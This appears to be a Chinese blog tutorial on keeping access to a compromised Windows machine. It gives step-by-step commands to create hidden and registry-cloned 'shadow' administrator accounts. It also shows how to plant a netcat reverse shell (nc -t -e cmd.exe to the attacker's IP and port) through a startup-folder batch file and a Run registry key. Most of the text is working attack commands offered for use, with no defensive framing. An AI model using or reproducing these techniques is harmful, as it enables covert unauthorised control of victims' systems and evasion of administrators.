Windows提权之权限维持

网友投稿 243 2022-10-23


Windows提权之权限维持

影子账号创建创建普通账号net user laosec 123admiN@ /add #创建普通账号laosec密码为123admiN@net localgroup administrators laosec /add #将普通账号laosec添加进administrators组

创建隐藏账号net user laosec$ 123admiN@ /add #创建隐藏账号laosec$密码为123admiN@(计算机管理可见)net localgroup administrators laosec$ /add #将隐藏账号laosec$添加到administrators组中

创建影子账号步骤一:打开注册表

WIN+R–>regedit #注册表编辑器命令HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/#遇到没有权限问题对HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限

步骤二:修改隐藏账号

在Users目录下有00000XXX开头的文件还有Names找到Names文件夹下的administrator单击,可以看到右侧的类型,其类型的值便对应着上面00000XXX选中与administrator所对应的00000XXX在右侧双击F键值,在弹出窗口中将值内容全部复制

#此值要给予要创建的影子账号的F键值中在Names中找到要修改账户的类型值,找到其对应的00000XXX,并将刚才复制的内容覆盖掉其影子账户的F中的值

导出Names下的影子账户为1.reg导出Users下影子账户对应的00000XXX为2.reg

步骤三:删除隐藏账号

net user laosec$ /del #删除隐藏账号laosec$

步骤四:创建隐藏账号

将1.reg导入到注册表中将2.reg导入到注册表中

步骤五:注销登录验证

NC自动反弹思路通过上传NC并配置注册表或开机自启动程序->重启服务器来获取到目标及其的CMD Shell

攻击者与受害者网络能够互通攻击者VPS必须时刻监听相对应的端口NC常规测试

nc -lvvp port #攻击者VPS操作 侦听本地portnc -t -e cmd.exe ip port #受害者操作 正向连接到攻击者的VPS

自启动目录

在受害者主机中进入到开机自启动目录下C:\Documents and Settings\Administrator\「开始」菜单\程序\启动创建sys.bat内容为start /b nc -t -e cmd.exe 192.168.31.132 4444在攻击者主机开启侦听重启受害者主机,等待shell反弹

注册表启动

reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “sysone” /t REG_SZ /d “C:sys.bat” /f

参数说明:/v 所选项之下要添加的值名/t RegKey 数据类型 如果忽略,则采用 REG_SZ/d 要分配给添加的注册表 ValueName 的数据/f 不用提示就强行改写现有注册表项在攻击者主机开启侦听重启受害者主机,等待shell反弹

结果验证


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:基于CLNC技术的免流
下一篇:如何获取Maven项目的版本号
相关文章

 发表评论

暂时没有评论,来抢沙发吧~